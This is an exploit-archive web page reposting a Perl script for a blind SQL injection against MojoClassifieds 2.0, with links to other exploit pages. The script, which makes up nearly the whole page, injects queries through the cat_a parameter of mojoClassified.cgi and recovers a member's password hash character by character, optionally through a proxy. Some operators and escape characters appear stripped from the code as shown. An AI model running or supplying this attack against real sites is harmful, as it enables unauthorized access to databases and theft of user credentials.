手机
当前位置:查字典教程网 >网络安全 >Exploit >MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoClassifieds Blind SQL Injection Exploit #n";

print " # (mojoClassified.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # <<>> MuSliMs HaCkErS <<>> #n";

print " # #n";

print " # HOME: WwW.PaL-HaCkEr.CoM #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl www.host.com / -d 10 #n";

print " # Options: #n";

print " # -d valid cat_a value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_a = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i )

{

my $f = 0;

my $h = 48;

while(!$f && $h <= 57)

{

if(istrue2($host, $cat_a, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

if(!$f)

{

$h = 97;

while(!$f && $h <= 122)

{

if(istrue2($host, $cat_a, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

}

}

print "n[~] Exploiting donen";

sub istrue2

{

my $host = shift;

my $cat_a = shift;

my $i = shift;

my $h = shift;

my $ua = LWP::UserAgent->new;

my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

if($options{"p"})

{

$ua->proxy('http', "http://".$options{"p"});

}

my $resp = $ua->get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoClassifieds 2.0 Remote Blind SQL Injection Exploit】相关文章:

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Dreampics Builder (page) Remote SQL Injection Vulnerability

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

精品推荐
分类导航